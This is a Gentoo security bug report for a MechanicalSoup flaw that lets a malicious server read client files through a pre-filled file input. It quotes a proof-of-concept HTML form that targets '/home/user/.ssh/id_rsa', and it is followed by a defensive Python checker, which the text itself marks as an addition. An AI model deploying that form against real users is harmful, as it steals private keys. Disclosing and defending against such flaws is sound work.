Bug 909723 (CVE-2023-34457) - <dev-python/MechanicalSoup-1.3.0: Malicious web server can read arbitrary files on client using file input inside HTML form
Status: IN_PROGRESS
Alias: CVE-2023-34457
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities
Hardware: All Linux
Importance: Normal minor
Assignee: Gentoo Security
URL: https://github.com/MechanicalSoup/Mec...
Whiteboard: B4 [glsa?]
Keywords:
Depends on:
Blocks:
 
Reported: 2023-07-05 06:19 UTC by Michał Górny
Modified: 2023-07-05 15:56 UTC
Description Michał Górny archtester Gentoo Infrastructure gentoo-dev Security 2023-07-05 06:19:26 UTC
Cleanup done already.


Summary
=======

A malicious web server can read arbitrary files on the client using an <input type="file" ...> inside an HTML form.

Details
=======

[…]

The file path is taken from the bs4 tag "value" attribute. However, this path will default to whatever the server sends. So if a malicious web server were to send something like:

<html><body>
  <form method="post" enctype="multipart/form-data">
    <input type="text" name="greeting" value="hello" />
    <input type="file" name="evil" value="/home/user/.ssh/id_rsa" />
  </form>
</body></html>

then upon .submit_selected() the mechanicalsoup browser will happily send over the contents of your SSH private key.
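
A pre-submission check for clients that fetch untrusted pages, added here as an example that is not part of the bug report or of MechanicalSoup: it uses only the standard library's html.parser (not bs4) to flag any file input whose value was pre-filled by the server. The class and function names and the benign sample page are assumptions; the malicious sample is the form quoted above.

```python
from html.parser import HTMLParser


class FileInputAuditor(HTMLParser):
    """Collects <input type="file"> elements that arrive with a value set."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.form_index = -1   # index of the most recently opened <form>
        self.in_form = False
        self.findings = []     # (form index or None, input name, supplied value)

    def handle_starttag(self, tag, attrs):
        # Self-closing tags (<input ... />) are also routed here by HTMLParser.
        if tag == "form":
            self.form_index += 1
            self.in_form = True
        elif tag == "input":
            a = {k: (v or "") for k, v in attrs}
            is_file = a.get("type", "").strip().lower() == "file"
            if is_file and a.get("value", "").strip():
                idx = self.form_index if self.in_form else None
                self.findings.append((idx, a.get("name", ""), a["value"]))

    def handle_endtag(self, tag):
        if tag == "form":
            self.in_form = False


def prefilled_file_inputs(html):
    """Return every file input whose path came from the page itself."""
    auditor = FileInputAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


def safe_to_submit(html):
    """True only if no file input carries a server-supplied value."""
    return not prefilled_file_inputs(html)


# Constructed samples: the first is the form from the report above.
MALICIOUS_PAGE = """<html><body>
  <form method="post" enctype="multipart/form-data">
    <input type="text" name="greeting" value="hello" />
    <input type="file" name="evil" value="/home/user/.ssh/id_rsa" />
  </form>
</body></html>"""
BENIGN_PAGE = '<form method="post"><input type="FILE" name="doc"></form>'
```

A caller would run safe_to_submit() on the fetched page body and refuse to submit the form when it returns False.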
Comment 1 John Helmert III archtester Gentoo Infrastructure gentoo-dev Security 2023-07-05 15:56:58 UTC
Thanks!